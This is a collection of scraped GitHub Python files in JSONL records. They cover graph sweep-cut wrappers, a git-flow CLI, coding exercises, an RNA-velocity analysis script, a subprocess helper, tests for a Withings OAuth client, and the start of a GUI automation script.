db\n","repo_name":"bcw1145/Day-Thirteen-and-Fourteen","sub_path":"stackoverflow.py","file_name":"stackoverflow.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10838965297","text":"# A python wrapper for sweep cut procedure\n# A - the sparse matrix representing the symmetric graph\n# ids - the order of vertices given\n# results - the best set with the smallest conductance\n# actual_length - the number of vertices in the best set\n# num - the number of vertices given\n# values - A vector scoring each vertex (e.g. pagerank value). \n# This will be sorted and turned into one of the other inputs.\n# flag - 0 for sweepcut_with_sorting and 1 for sweepcut_without_sorting\n# degrees - user defined degrees, set it to be [] if not provided\n# min_cond - minimum conductance\n\nfrom operator import itemgetter\nimport numpy as np\nfrom numpy.ctypeslib import ndpointer\nimport ctypes\n#from localgraphclustering.find_library import load_library\n\ndef wrapped_ndptr(*args, **kwargs):\n base = ndpointer(*args, **kwargs)\n def from_param(cls, obj):\n if obj is None:\n return obj\n return base.from_param(obj)\n return type(base.__name__, (base,), {'from_param': classmethod(from_param)})\n\ndef sweepcut_cpp(n,ai,aj,a,ids,num,values,flag,lib,degrees = None):\n float_type = ctypes.c_double\n dt = np.dtype(ai[0])\n (itype, ctypes_itype) = (np.int64, ctypes.c_int64) if dt.name == 'int64' else (np.uint32, ctypes.c_uint32)\n dt = np.dtype(aj[0])\n (vtype, ctypes_vtype) = (np.int64, ctypes.c_int64) if dt.name == 'int64' else (np.uint32, ctypes.c_uint32)\n\n #lib = load_library()\n \n if (vtype, itype) == (np.int64, np.int64):\n fun = lib.sweepcut_with_sorting64 if flag == 0 else lib.sweepcut_without_sorting64\n elif (vtype, itype) == (np.uint32, np.int64):\n fun = lib.sweepcut_with_sorting32_64 if flag == 0 else lib.sweepcut_without_sorting32_64\n else:\n fun = lib.sweepcut_with_sorting32 if flag == 0 else lib.sweepcut_without_sorting32\n\n #call C function\n ids=np.array(ids,dtype=vtype)\n values=np.array(values,dtype=float_type)\n results=np.zeros(num,dtype=vtype)\n fun.restype=ctypes_vtype\n min_cond = np.array([0.0],dtype=float_type)\n if degrees is not None:\n degrees = np.array(degrees,dtype=float_type)\n if flag == 0:\n fun.argtypes=[ndpointer(ctypes.c_double, flags=\"C_CONTIGUOUS\"),\n ndpointer(ctypes_vtype, flags=\"C_CONTIGUOUS\"),\n ndpointer(ctypes_vtype, flags=\"C_CONTIGUOUS\"),\n ctypes_vtype,ctypes_vtype,\n ndpointer(ctypes_itype, flags=\"C_CONTIGUOUS\"),\n ndpointer(ctypes_vtype, flags=\"C_CONTIGUOUS\"),\n ndpointer(ctypes.c_double, flags=\"C_CONTIGUOUS\"),\n ctypes_vtype,\n ndpointer(ctypes.c_double, flags=\"C_CONTIGUOUS\"),\n wrapped_ndptr(dtype=ctypes.c_double,ndim=1,flags=\"C_CONTIGUOUS\")\n ]\n actual_length=fun(values,ids,results,num,n,ai,aj,a,0,min_cond,degrees)\n else:\n fun.argtypes=[ndpointer(ctypes_vtype, flags=\"C_CONTIGUOUS\"),\n ndpointer(ctypes_vtype, flags=\"C_CONTIGUOUS\"),\n ctypes_vtype,ctypes_vtype,\n ndpointer(ctypes_itype, flags=\"C_CONTIGUOUS\"),\n ndpointer(ctypes_vtype, flags=\"C_CONTIGUOUS\"),\n ndpointer(ctypes.c_double, flags=\"C_CONTIGUOUS\"),\n ctypes_vtype,\n ndpointer(ctypes.c_double, flags=\"C_CONTIGUOUS\"),\n wrapped_ndptr(dtype=ctypes.c_double,ndim=1,flags=\"C_CONTIGUOUS\")\n ]\n actual_length=fun(ids,results,num,n,ai,aj,a,0,min_cond,degrees)\n\n actual_results=np.empty(actual_length,dtype=vtype)\n actual_results[:]=[results[i] for i in range(actual_length)]\n min_cond = min_cond[0]\n\n return (actual_length,actual_results,min_cond)\n","repo_name":"RevoData/LocalGraphClustering","sub_path":"localgraphclustering/cpp/sweepcut_cpp.py","file_name":"sweepcut_cpp.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"33332602650","text":"import os\nimport subprocess\nimport click\nfrom src.utils.git import get_repo_abspath, get_url\nfrom src.utils.shell import shell_run\nfrom src.utils.config_file import read_config\nfrom src.commands import hotfix_command, feature_command, release_command\nfrom src.utils.config_file import CONFIG_FILE_NAME\nfrom src.settings import color\n\n\nfailed_color = color.RED\nsucceed_color = color.GREEN\ndisable_color = color.END\n\n\ndef echo(output,verbose):\n verbose_output = output[0]\n note = output[1]\n status = output[2]\n if verbose:\n click.echo(verbose_output)\n if status == \"succeed\":\n color = succeed_color\n else:\n color = failed_color\n click.echo(color + note + disable_color)\n\n\n@click.group()\n@click.pass_context\ndef githubflow(ctx):\n ctx.obj[\"url\"] = get_url()\n\n@githubflow.command()\n@click.option('-a','--action',required=True,help=\"create / ready / done\")\n@click.option('--verbose', '-v', is_flag=True, help=\"Verbose output.\")\n@click.argument('branch_name')\ndef hotfix(action,branch_name,verbose):\n \"\"\"\n Manage Hotfix branch workflow. (READ MORE: https://documentation/hotfix)\n \"\"\"\n output = hotfix_command.main(action, branch_name)\n echo(output, verbose)\n\n@githubflow.command()\n@click.option('-a','--action',required=True,help=\"create / ready / done\")\n@click.option('--verbose', '-v', is_flag=True, help=\"Vebose output.\")\n@click.argument('branch_name')\ndef feature(action,branch_name,verbose):\n \"\"\"\n Manage Feature branch workflow. (READ MORE: https://documentation/feature)\n \"\"\"\n output = feature_command.main(action, branch_name)\n echo(output, verbose)\n\n@githubflow.command()\n@click.option('-a','--action',required=True,help=\"create / publish\")\n@click.option('--verbose', '-v', is_flag=True, help=\"Vebose output.\")\n@click.argument('branch_name')\ndef release(action,branch_name,verbose):\n \"\"\"\n Manage Release branch workflow. (READ MORE: https://documentation/release)\n \"\"\"\n output = release_command.main(action, branch_name)\n echo(output, verbose)\n\n\ndef main():\n githubflow(obj={})\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"ShakedBraimok/github-flow","sub_path":"src/github_flow.py","file_name":"github_flow.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"} +{"seq_id":"14024589731","text":"class Solution:\n def maxDistance(self, grid: List[List[int]]) -> int:\n n = len(grid)\n dq = deque([(i, j, 0) for i in range(n) for j in range(n) if grid[i][j]])\n dist = [[0] * n for i in range(n)]\n neighbours = [(-1, 0), (1, 0), (0, -1), (0, 1)]\n \n while dq:\n i, j, cost = dq.popleft()\n \n if dist[i][j]:\n continue\n \n dist[i][j] = cost\n \n for x, y in neighbours:\n if 0 <= i + x < n and 0 <= j + y < n and grid[i + x][j + y] == 0 and dist[i + x][j + y] == 0:\n dq.append((i + x, j + y, cost + 1))\n \n maxi = -1\n for i in range(n):\n maxi = max(maxi, max(dist[i]))\n \n return maxi if maxi != 0 else -1\n ","repo_name":"prashanthr11/Leetcode_solutions","sub_path":"1162-as-far-from-land-as-possible/1162-as-far-from-land-as-possible.py","file_name":"1162-as-far-from-land-as-possible.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17539066584","text":"##run scVelo\nimport anndata\nimport scvelo as scv\nimport pandas as pd\nimport numpy as np\nimport matplotlib as plt\nplt.use('pdf')\nimport scanpy as sc\n\n##input the h5ad from scVelo_input.R\nadata_h5ad=sc.read_h5ad(\"/public/ojsys/eye/sujianzhong/chencheng/Singlecell/LiHui/final/scVelo/data.h5ad\")\nadata_h5ad.obs[\"wsnn_res_0.5_cell_type\"]\n\n##input metadata from scVelo_input.R\nmeta=pd.read_csv(\"/public/ojsys/eye/sujianzhong/chencheng/Singlecell/LiHui/final/scVelo/metadata.csv\",index_col=0)\nadata_h5ad.obs=meta\n\n##input the loom\nadata_loom = anndata.read_loom(\"/public/ojsys/eye/sujianzhong/chencheng/Singlecell/LiHui/final_version/scVelo/total_fetus.loom\")\nadata_loom.var_names_make_unique()\n\n##change the cell barcodes in loom\nbarcodes=adata_loom.obs.index.tolist()\nfor i in range(len(barcodes)):\n if barcodes[i].startswith('NR'):\n barcodes[i]=barcodes[i].replace('NR:','').replace('x','-1_1')\n elif barcodes[i].startswith('CMZ'):\n barcodes[i]=barcodes[i].replace('CMZ:','').replace('x','-1_2')\nadata_loom.obs.index=barcodes\n\n##subset the cells both in adata_h5ad and adata_loom\ncell_names=adata_h5ad.obs.index \nadata_loom_subset=adata_loom[adata_loom.obs_names.isin(cell_names), :]\n\n##merge adata_h5ad and adata_loom\nadata_merge=scv.utils.merge(adata_h5ad,adata_loom_subset)\n#sc.write('merged.h5ad',adata_merge,compression='gzip',compression_opts=1)\n\n##figure setting\nscv.settings.verbosity = 3\nscv.settings.set_figure_params('scvelo', facecolor='white', dpi=100, frameon=False)\nscv.settings.rcParams['font.size']=4 ##font.size\n\n##data preprocess\nscv.pp.filter_and_normalize(adata_merge, min_shared_counts=20, n_top_genes=2000)\nscv.pp.moments(adata_merge, n_pcs=30, n_neighbors=30)\n\n##RNA Velocity\nscv.tl.recover_dynamics(adata_merge)\nscv.tl.velocity(adata_merge, mode='dynamical')\n#scv.tl.velocity(adata_merge, mode='stochastic')\nscv.tl.velocity_graph(adata_merge)\n\n##save the result\nadata_merge.write('scVelo.h5ad')\n","repo_name":"sulab-wmu/hRSLCs-Retina","sub_path":"analysis/figure1/scVelo.py","file_name":"scVelo.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38896781645","text":"#!/usr/bin/env python\n\nimport os\nimport shlex\nimport tempfile\nimport subprocess\nfrom time import sleep\n\n\nclass Process(object):\n \"\"\"Wrapper around subprocess module that runs a command with a\n specific environment. When run method is called it will block\n until the command finishes executing.\n\n Usage:\n\n command = 'date'\n environment = {'TZ': 'UTC'}\n\n proc = Process(command, environment)\n proc.run()\n\n if proc.status:\n print ''.join(proc.stdout)\n else:\n print ''.join(proc.stderr)\n \"\"\"\n def __init__(self, command, environment=os.environ.copy(), logger=None):\n self.status = None\n self.stdout = None\n self.stderr = None\n self.logger = logger\n self.process = None\n self.command = command\n self.environment = environment\n\n def run(self):\n f_stdout = tempfile.TemporaryFile()\n f_stderr = tempfile.TemporaryFile()\n\n self.process = subprocess.Popen(shlex.split(self.command),\n env=self.environment,\n stdout=f_stdout,\n stderr=f_stderr)\n\n while self.process.poll() is None:\n sleep(.5)\n\n f_stdout.seek(0)\n f_stderr.seek(0)\n\n self.stdout = f_stdout.readlines()\n self.stderr = f_stderr.readlines()\n\n f_stdout.close()\n f_stderr.close()\n\n if self.process.returncode == 0:\n self.status = True\n else:\n self.status = False\n\n if self.logger:\n self.logger.debug(\"[Process:localhost] Executing command: '{0}'\".format(self.command))\n\n return self.status\n","repo_name":"miljank/centreon-client","sub_path":"centreond/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"72525365801","text":"# ---------------------------------- PROBLEM 17 (MEDIUM) --------------------------------------#\n# Remove Kth Node From End\n\n# Write a function that takes in the head of a Singly Linked List and an integer k (assume that the \n# list has at least k nodes). The function should remove the kth node from the end of the list. \n# Note that every node in the Singly Linked List has a \"value\" property storing its value as well as \n# a \"next\" property pointing to the next node in the list or None (null) if it is the tail of the list.\n\n# Sample input: 0 -> 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7 -> 8 -> 9, 4\n# Sample output: 0 -> 1 -> 2 -> 3 -> 4 -> 5 -> 7 -> 8 -> 9\n\n# ----------------METHOD 01---------------------#\n# COMPLEXITY = TIME: O(n), SPACE: O(1)\ndef removeKthNodeFromEnd(head, k):\n\tcounter = 1 \n\tfirst = head\n\tsecond = head\n\twhile counter <= k:\n\t\tsecond = second.next\n\t\tcounter += 1\n\tif second is None:\n\t\thead.value = head.next.value\n\t\thead.next = head.next.next\n\t\treturn\n\twhile second.next is not None:\n\t\tsecond = second.next\n\t\tfirst = first.next\n\tfirst.next = first.next.next\n\treturn head\n# ----------------METHOD 01---------------------#","repo_name":"CodeInDna/Algo_with_Python","sub_path":"02_Medium/17_Remove_Kth_Node_From_End/Remove_kth_Node_From_End.py","file_name":"Remove_kth_Node_From_End.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"17053123630","text":"from __future__ import annotations\n\nimport os\nimport time\nfrom collections.abc import Generator\nfrom json import JSONDecodeError\nfrom typing import Any\nfrom unittest.mock import MagicMock\nfrom unittest.mock import patch\n\nimport pytest\nfrom egg_stats import withings_provider\nfrom egg_stats.withings_provider import _AuthClient\nfrom egg_stats.withings_provider import _AuthedUser\nfrom egg_stats.withings_provider import Activity\nfrom egg_stats.withings_provider import HTTPResponse\nfrom egg_stats.withings_provider import WithingsProvider\n\nMOCK_AUTH_USER: Any = {\n \"userid\": \"mockuserid\",\n \"access_token\": \"mock_access_token\",\n \"refresh_token\": \"mock_refresh_token\",\n \"scope\": \"user.activity,user.metrics\",\n \"expiry\": time.time() + 1000,\n \"token_type\": \"Bearer\",\n}\nMOCK_AUTH_RESPONSE: Any = {\n \"status\": 0,\n \"body\": {\n \"userid\": \"mockuserid\",\n \"access_token\": \"mock_access_token\",\n \"refresh_token\": \"mock_refresh_token\",\n \"scope\": \"user.activity,user.metrics\",\n \"expires_in\": time.time() + 1000,\n \"token_type\": \"Bearer\",\n },\n}\nMOCK_ACTIVITY_RESPONSE: Any = [\n {\n \"steps\": 55,\n \"distance\": 44.71,\n \"elevation\": 0,\n \"soft\": 240,\n \"moderate\": 0,\n \"intense\": 0,\n \"active\": 0,\n \"calories\": 1.91,\n \"totalcalories\": 2066.383,\n \"hr_average\": 71,\n \"hr_min\": 62,\n \"hr_max\": 84,\n \"hr_zone_0\": 7241,\n \"hr_zone_1\": 0,\n \"hr_zone_3\": 0,\n \"deviceid\": None,\n \"hash_deviceid\": None,\n \"timezone\": \"America/New_York\",\n \"date\": \"2023-01-28\",\n \"modified\": 1675059819,\n \"brand\": 18,\n \"is_tracker\": True,\n }\n]\n\n\n@pytest.fixture(autouse=True)\ndef mock_env() -> Generator[None, None, None]:\n \"\"\"Mock the environment variables.\"\"\"\n mask_env = {\n \"WITHINGS_CLIENT_ID\": \"\",\n \"WITHINGS_CLIENT_SECRET\": \"\",\n }\n\n with patch.dict(os.environ, mask_env):\n yield None\n\n\n@pytest.fixture\ndef auth_client() -> _AuthClient:\n return _AuthClient(\"mock\", \"mock\", MagicMock())\n\n\n@pytest.fixture\ndef provider(auth_client: _AuthClient) -> WithingsProvider:\n withing_provider = WithingsProvider(\"mock\", \"mock\")\n withing_provider._auth_client = auth_client\n return withing_provider\n\n\ndef test_HTTPResponse_handles_empty_json() -> None:\n \"\"\"Test the HTTPResponse class.\"\"\"\n response = MagicMock()\n response.json.side_effect = JSONDecodeError(\"msg\", \"doc\", 0)\n response.status_code = 204\n response.url = \"https://example.com\"\n response.is_success = False\n\n http_response = HTTPResponse(response)\n\n assert http_response.json() == {}\n assert http_response.status_code == 204\n assert http_response.url == \"https://example.com\"\n assert http_response.is_success is False\n\n\ndef test_HTTPResponse_handles_200() -> None:\n \"\"\"Test the HTTPResponse class.\"\"\"\n response = MagicMock()\n response.json.return_value = {\"status\": 0}\n response.status_code = 200\n response.url = \"https://example.com\"\n response.is_success = True\n\n http_response = HTTPResponse(response)\n\n assert http_response.json() == {\"status\": 0}\n assert http_response.status_code == 200\n assert http_response.url == \"https://example.com\"\n assert http_response.is_success is True\n\n\ndef test_AuthedUser_from_dict() -> None:\n body = MOCK_AUTH_RESPONSE[\"body\"]\n authed_user = _AuthedUser.from_dict(body)\n\n assert authed_user.userid == body[\"userid\"]\n assert authed_user.access_token == body[\"access_token\"]\n assert authed_user.refresh_token == body[\"refresh_token\"]\n assert authed_user.scope == body[\"scope\"]\n # Less than due to the expiry buffer being subtracted\n assert authed_user.expiry < time.time() + body[\"expires_in\"]\n assert authed_user.token_type == body[\"token_type\"]\n\n\ndef test_AuthClient_raises_ValueError_if_no_client_id() -> None:\n from egg_stats.withings_provider import _AuthClient\n\n with pytest.raises(ValueError):\n _AuthClient()\n\n\ndef test_AuthClient_reads_secrets_from_env() -> None:\n os.environ[\"WITHINGS_CLIENT_ID\"] = \"foo\"\n os.environ[\"WITHINGS_CLIENT_SECRET\"] = \"bar\"\n\n auth_client = _AuthClient()\n\n assert auth_client.client_id == \"foo\"\n assert auth_client.client_secret == \"bar\"\n\n\ndef test_AuthClient_reads_secrets_from_args() -> None:\n os.environ[\"WITHINGS_CLIENT_ID\"] = \"foo\"\n os.environ[\"WITHINGS_CLIENT_SECRET\"] = \"bar\"\n\n auth_client = _AuthClient(\"high\", \"low\")\n\n assert auth_client.client_id == \"high\"\n assert auth_client.client_secret == \"low\"\n\n\ndef test_AuthClient_authed_user_property_raises_ValueError_if_no_authed_user() -> None:\n auth_client = _AuthClient(\"mock\", \"mock\", MagicMock())\n\n with pytest.raises(ValueError):\n auth_client.authed_user\n\n\ndef test_get_state_code(auth_client: _AuthClient) -> None:\n result01 = auth_client.create_state_code()\n result02 = auth_client.create_state_code()\n\n assert result01 != result02\n\n\ndef test_get_authorization_url(auth_client: _AuthClient) -> None:\n resp = HTTPResponse(MagicMock())\n resp.url = \"https://account.withings.com/oauth2_user/authorize2\"\n state = \"mock_challenge\"\n rd_url = \"https://mock_redirect_url.com/mock\"\n scope = \"mock_scope\"\n expected_params = {\n \"response_type\": \"code\",\n \"client_id\": \"mock\",\n \"scope\": scope,\n \"state\": state,\n \"redirect_uri\": rd_url,\n }\n url = withings_provider.AUTH_URL\n\n with patch.object(auth_client, \"_handle_http\", return_value=resp) as mock_http:\n result = auth_client.get_authorization_url(rd_url, scope, state)\n\n assert result == resp.url\n mock_http.assert_called_once_with(\"GET\", url, params=expected_params)\n\n\ndef test_authenticate(auth_client: _AuthClient) -> None:\n mockresp = HTTPResponse(MagicMock())\n mockresp._json = MOCK_AUTH_RESPONSE\n code = \"mockcode\"\n redirect_uri = \"https://mock_redirect_url.com/mock\"\n expected_params = {\n \"action\": \"requesttoken\",\n \"client_id\": \"mock\",\n \"client_secret\": \"mock\",\n \"grant_type\": \"authorization_code\",\n \"code\": code,\n \"redirect_uri\": redirect_uri,\n }\n url = f\"{withings_provider.BASE_URL}/v2/oauth2\"\n\n with patch.object(auth_client, \"_handle_http\", return_value=mockresp) as mock_http:\n auth_client.authenticate(code, redirect_uri)\n\n assert auth_client._authed_user is not None\n assert auth_client._authed_user.userid == MOCK_AUTH_RESPONSE[\"body\"][\"userid\"]\n mock_http.assert_called_once_with(\"POST\", url, params=expected_params)\n\n\ndef test_get_bearer_token_with_existing(auth_client: _AuthClient) -> None:\n auth_client._authed_user = _AuthedUser(**MOCK_AUTH_USER)\n\n result = auth_client._get_bearer_token()\n\n assert result == auth_client._authed_user.access_token\n\n\ndef test_get_bearer_token_refresh(auth_client: _AuthClient) -> None:\n auth_client._authed_user = _AuthedUser(**MOCK_AUTH_USER)\n auth_client._authed_user.expiry = 0\n\n with patch.object(auth_client, \"_refresh_access_token\") as mock_refresh:\n mock_refresh.return_value = _AuthedUser(**MOCK_AUTH_USER)\n result = auth_client._get_bearer_token()\n\n mock_refresh.assert_called_once()\n assert result == MOCK_AUTH_RESPONSE[\"body\"][\"access_token\"]\n\n\ndef test_get_bearer_token_no_authed_user(auth_client: _AuthClient) -> None:\n with pytest.raises(ValueError, match=\"^Expected authenticated user.$\"):\n auth_client._get_bearer_token()\n\n\ndef test_get_headers(auth_client: _AuthClient) -> None:\n with patch.object(auth_client, \"_get_bearer_token\") as mock_token:\n mock_token.return_value = \"mocktoken\"\n result = auth_client.get_headers()\n\n mock_token.assert_called_once()\n assert result[\"Authorization\"] == \"Bearer mocktoken\"\n\n\ndef test_refresh_access_token(auth_client: _AuthClient) -> None:\n auth_client._authed_user = _AuthedUser(**MOCK_AUTH_USER)\n auth_client._authed_user.access_token = \"some_old_token\"\n mockresp = HTTPResponse(MagicMock())\n mockresp._json = MOCK_AUTH_RESPONSE\n expected_token = MOCK_AUTH_RESPONSE[\"body\"][\"access_token\"]\n expected_params = {\n \"action\": \"requesttoken\",\n \"client_id\": \"mock\",\n \"client_secret\": \"mock\",\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": \"mock_refresh_token\",\n }\n url = f\"{withings_provider.BASE_URL}/v2/oauth2\"\n\n with patch.object(auth_client, \"_handle_http\", return_value=mockresp) as mock_http:\n auth_client._refresh_access_token()\n\n assert auth_client._authed_user.access_token == expected_token\n mock_http.assert_called_once_with(\"POST\", url, params=expected_params)\n\n\ndef test_create_signature(auth_client: _AuthClient) -> None:\n result = auth_client.get_signature(\"mockdata\", \"12345\")\n # This is the expected result of the above data and timestamp\n assert result == \"8b3db37b7c80908b944b7fc5164c42b235da89772cf56c745a734bf74dac287a\"\n\n\ndef test_get_nonce(auth_client: _AuthClient) -> None:\n mockresp = HTTPResponse(MagicMock())\n mockresp._json = {\"status\": 0, \"body\": {\"nonce\": \"mock\"}}\n set_timestamp = 12345\n expected_params = {\n \"action\": \"getnonce\",\n \"client_id\": \"mock\",\n \"signature\": auth_client.get_signature(\"getnonce\", str(set_timestamp)),\n \"timestamp\": str(set_timestamp),\n }\n url = f\"{withings_provider.BASE_URL}/v2/signature\"\n\n with patch(\"time.time\", return_value=set_timestamp):\n with patch.object(auth_client, \"_handle_http\", return_value=mockresp) as mock:\n result = auth_client.get_nonce()\n\n assert result == \"mock\"\n mock.assert_called_once_with(\"POST\", url, params=expected_params)\n\n\ndef test_revoke_access_token(auth_client: _AuthClient) -> None:\n auth_client._authed_user = _AuthedUser(**MOCK_AUTH_USER)\n mockresp = HTTPResponse(MagicMock())\n mockresp._json = {\"status\": 0, \"body\": {}}\n set_nonce = \"mocknonce\"\n expected_params = {\n \"action\": \"revoke\",\n \"client_id\": \"mock\",\n \"nonce\": set_nonce,\n \"signature\": auth_client.get_signature(\"revoke\", set_nonce),\n \"userid\": \"mockuserid\",\n }\n url = f\"{withings_provider.BASE_URL}/v2/oauth2\"\n\n with patch.object(auth_client, \"_handle_http\", return_value=mockresp) as mockhttp:\n with patch.object(auth_client, \"get_nonce\", return_value=set_nonce):\n auth_client._revoke_access_token()\n\n mockhttp.assert_called_once_with(\"POST\", url, params=expected_params)\n\n\ndef test_auth_client_handle_http(auth_client: _AuthClient) -> None:\n mock_resp = MagicMock(status_code=200, json=MagicMock())\n mock_resp.json.return_value = {\"status\": 0, \"body\": {\"mock\": \"body\"}}\n url = \"https://mockurl.com\"\n params = {\"mock\": \"params\"}\n verb = \"GET\"\n\n with patch.object(auth_client._http, \"request\", return_value=mock_resp) as mock:\n resp = auth_client._handle_http(verb, url, params)\n\n mock.assert_called_once_with(verb, url, params=params)\n assert resp.is_success is True\n assert resp.json() == {\"status\": 0, \"body\": {\"mock\": \"body\"}}\n\n\ndef test_auth_client_handle_http_failure(auth_client: _AuthClient) -> None:\n mock_resp = MagicMock(status_code=200, json=MagicMock())\n mock_resp.json.return_value = {\"status\": 1, \"body\": {\"mock\": \"body\"}}\n\n with patch.object(auth_client, \"get_headers\", return_value={}):\n with patch.object(auth_client._http, \"request\", return_value=mock_resp):\n with pytest.raises(ValueError, match=\"^Failed\"):\n auth_client._handle_http(\"GET\", \"mock\", {})\n\n\ndef test_withings_provider_handle_http(provider: WithingsProvider) -> None:\n mock_headers = {\"Authorization\": \"Bearer mocktoken\"}\n mock_resp = MagicMock(status_code=200, json=MagicMock())\n mock_resp.json.return_value = {\"status\": 0, \"body\": {\"mock\": \"body\"}}\n url = \"https://mockurl.com\"\n params = {\"mock\": \"params\"}\n verb = \"GET\"\n\n with patch.object(provider._auth_client, \"get_headers\", return_value=mock_headers):\n with patch.object(provider._http, \"request\", return_value=mock_resp) as mock:\n resp = provider._handle_http(verb, url, params)\n\n mock.assert_called_once_with(verb, url, headers=mock_headers, params=params)\n assert resp.is_success is True\n assert resp.json() == {\"status\": 0, \"body\": {\"mock\": \"body\"}}\n\n\ndef test_withings_provider_handle_http_failure(provider: WithingsProvider) -> None:\n mock_resp = MagicMock(status_code=200, json=MagicMock())\n mock_resp.json.return_value = {\"status\": 1, \"body\": {\"mock\": \"body\"}}\n\n with patch.object(provider._auth_client, \"get_headers\", return_value={}):\n with patch.object(provider._http, \"request\", return_value=mock_resp):\n with pytest.raises(ValueError, match=\"^Failed\"):\n provider._handle_http(\"GET\", \"mock\", {})\n\n\ndef test_withings_provider_activity_list(provider: WithingsProvider) -> None:\n # NOTE: This will fail if run between 23:59:59 and 00:00:00\n resp = MOCK_ACTIVITY_RESPONSE\n url = f\"{withings_provider.BASE_URL}/v2/measure\"\n days = 12\n starttime = int(time.time()) - (days * 24 * 60 * 60)\n expected = [Activity(**activity) for activity in MOCK_ACTIVITY_RESPONSE]\n\n params = {\n \"action\": \"getactivity\",\n \"startdateymd\": time.strftime(\"%Y-%m-%d\", time.localtime(starttime)),\n \"enddateymd\": time.strftime(\"%Y-%m-%d\", time.localtime()),\n \"data_fields\": \",\".join(withings_provider.DATA_FIELDS),\n }\n\n with patch.object(provider, \"_handle_paginated\", return_value=resp) as mock_http:\n result = provider.activity_list(days)\n\n assert result == expected\n mock_http.assert_called_once_with(\"activities\", \"POST\", url, params)\n\n\ndef test_withings_provider_handle_paginated(provider: WithingsProvider) -> None:\n side_effect = [\n MagicMock(status_code=200, json=MagicMock()),\n MagicMock(status_code=200, json=MagicMock()),\n ]\n side_effect[0].json.return_value = {\n \"status\": 0,\n \"body\": {\"more\": True, \"offset\": 1, \"series\": [1]},\n }\n side_effect[1].json.return_value = {\n \"status\": 0,\n \"body\": {\"more\": False, \"offset\": 2, \"series\": [2]},\n }\n expected = [1, 2]\n\n with patch.object(provider, \"_handle_http\", side_effect=side_effect) as mock_http:\n result = provider._handle_paginated(\n label=\"series\",\n verb=\"POST\",\n url=\"mockurl\",\n params={\"mock\": \"params\"},\n )\n\n assert result == expected\n assert mock_http.call_count == 2\n\n\ndef test_withings_provider_user(provider: WithingsProvider) -> None:\n mock_user = _AuthedUser.from_dict(MOCK_AUTH_RESPONSE[\"body\"])\n provider._auth_client._authed_user = mock_user\n\n user = provider.user\n\n assert user.userid == mock_user.userid\n assert user.refresh_token == mock_user.refresh_token\n\n\ndef test_withings_provider_user_no_auth(provider: WithingsProvider) -> None:\n provider._auth_client._authed_user = None\n\n with pytest.raises(ValueError, match=\"^Not authenticated\"):\n provider.user\n\n\ndef test_withings_provider_get_authentication_url(provider: WithingsProvider) -> None:\n state = \"mockstate\"\n redirect_uri = \"https://mockurl.com\"\n scope = \"mockscope\"\n\n with patch.object(provider._auth_client, \"create_state_code\", return_value=state):\n with patch.object(provider._auth_client, \"get_authorization_url\") as mock:\n url = provider.get_authentication_url(redirect_uri, scope)\n\n mock.assert_called_once_with(redirect_uri, scope, state)\n assert url == mock.return_value\n assert provider._last_state == state\n\n\ndef test_withings_provider_authenticate(provider: WithingsProvider) -> None:\n code = \"mockcode\"\n state = \"mockstate\"\n redirect_uri = \"https://mockurl.com\"\n provider._last_state = state\n\n with patch.object(provider._auth_client, \"authenticate\") as mock:\n provider.authenticate(code, state, redirect_uri)\n\n mock.assert_called_once_with(code, redirect_uri)\n\n\ndef test_withings_provider_authenticate_bad_state(provider: WithingsProvider) -> None:\n code = \"mockcode\"\n state = \"mockstate\"\n redirect_uri = \"https://mockurl.com\"\n provider._last_state = \"badstate\"\n\n with pytest.raises(ValueError, match=\"^Invalid state\"):\n provider.authenticate(code, state, redirect_uri)\n\n\n# TODO: Move to where authentication happens\ndef test_split_response() -> None:\n response = \"https://localhost:8080/?code=foo&state=bar\"\n expected = (\"foo\", \"bar\")\n result = withings_provider.split_response(response)\n\n assert result == expected\n\n\n# TODO: Move to where authentication happens\ndef test_get_response_url() -> None:\n url = \"https://account.withings.com/oauth2_user/authorize2\"\n expected = \"https://localhost:8080/?code=foo&state=bar\"\n\n with patch(\"builtins.input\", return_value=expected):\n result = withings_provider.get_response_url(url)\n\n assert result == expected\n","repo_name":"Preocts/egg-stats","sub_path":"tests/withings_provider_test.py","file_name":"withings_provider_test.py","file_ext":"py","file_size_in_byte":16955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23096569088","text":"import os\n\nimport openpyxl\nimport pyautogui\nimport threading\nimport time\nimport inspect\nimport ctypes\nimport pyperclip\nfrom configobj import ConfigObj\n\n\ndef _async_raise(tid, exctype):\n \"\"\"raises the exception, performs cleanup if needed\"\"\"\n\n tid = ctypes.c_long(tid)\n\n if not inspect.isclass(exctype):\n exctype = type(exctype)\n\n res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))\n\n if res == 0:\n\n raise ValueError(\"invalid thread id\")\n\n elif res != 1:\n\n # \"\"\"if it returns a number greater than one, you're in trouble,\n\n # and you should call it again with exc=NULL to revert the effect\"\"\"\n\n ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)\n\n raise SystemError(\"PyThreadState_SetAsyncExc failed\")\n\n\ndef stop_thread(thread):\n _async_raise(thread.ident, SystemExit)\n\n\nclass Job(threading.Thread):\n\n def __init__(self, *args, **kwargs):\n super(Job, self).__init__(*args, **kwargs)\n # 用于暂停线程的标识\n self.__flag = threading.Event()\n self.__flag.set() # 设置为True\n # 用于停止线程的标识\n self.__running = threading.Event()\n self.__running.set() # 将running设置为True\n\n def run(self):\n config1 = ConfigObj(\"./config/表格配置.ini\", 